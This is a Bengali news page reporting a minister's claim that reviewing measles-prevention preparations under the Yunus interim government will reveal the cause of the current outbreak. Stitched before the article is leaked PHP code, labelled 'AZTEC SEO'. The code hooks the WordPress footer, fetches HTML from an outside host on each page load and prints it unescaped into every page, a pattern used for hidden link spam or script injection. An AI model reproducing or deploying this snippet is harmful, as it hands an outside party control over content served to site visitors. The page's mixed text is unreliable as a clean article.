/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ‘ইউনূস আমলের হাম প্রতিরোধের প্রস্তুতি খতিয়ে দেখলেই প্রাদুর্ভাবের কারণ জানা যাবে’ | Dhaka Sky News

রাজ্যসভার সদস্য হিসেবে শপথ নিলেন কোয়েল মল্লিক

আগের সংবাদ

‘লঘুদণ্ডের’ দুইমাস পরও স্বপদে বহাল ভূমি কর্মচারী

পরের সংবাদ

‘ইউনূস আমলের হাম প্রতিরোধের প্রস্তুতি খতিয়ে দেখলেই প্রাদুর্ভাবের কারণ জানা যাবে’

যুগান্তর প্রতিবেদন

প্রকাশিত: April 6, 2026 , 6:49 pm

সমাজকল্যাণ এবং মহিলা ও শিশু বিষয়কমন্ত্রী অধ্যাপক ডা. এ জেড এম জাহিদ হোসেন বলেছেন, ড. ইউনূসের নেতৃত্বাধীন অন্তর্বর্তী সরকারের সময় হাম প্রতিরোধের সার্বিক প্রস্তুতি পর্যালোচনা করলেই বের হয়ে আসবে বর্তমানে এ রোগের প্রাদুর্ভাবের প্রকৃত কারণ।

সোমবার (৬ এপ্রিল) রাজধানীর গুলশানে প্ল্যান ইন্টারন্যাশনাল বাংলাদেশ আয়োজিত এক সেমিনারে এ কথা বলেন তিনি।

এ সময় নারী ও শিশু নির্যাতন এবং দুর্নীতির বিরুদ্ধে সরকারের তরফ থেকে জিরো টলারেন্স নীতি বজায় রাখার কথাও বলেন তিনি।

জাহিদ হোসেন বলেন, জনগণের প্রতি দায়বদ্ধতার জায়গা থেকে বর্তমান সরকার প্রতিনিয়ত কাজ করে যাচ্ছে। পাহাড়সম সমস্যা দূর করার ক্ষেত্রে রাষ্ট্রের পাশাপাশি সামাজিকভাবেও সবাইকে এগিয়ে আসতে হবে।

তিনি বলেন, অনেক প্রত্যাশা নিয়ে এ দেশের জনগণ সরকারকে দায়িত্ব দিয়েছে তাই, সেই দায়বদ্ধতার জায়গা থেকে বর্তমান সরকার প্রতিনিয়ত কাজ করে যাচ্ছে।

অন্তর্বর্তী সরকারের সময় হামের ভ্যাকসিন কেনা হয়েছে কিনা কিংবা এ সংক্রান্ত বিষয়ে খোঁজ নিলে বোঝা যাবে এখন কেন এমনটা হচ্ছে বলেও জানান তিনি।

সেমিনারে উপস্থিত অতিথিরা নারীর অধিকার নিশ্চিতে সবাইকে এগিয়ে আসার আহ্বান জানান তিনি।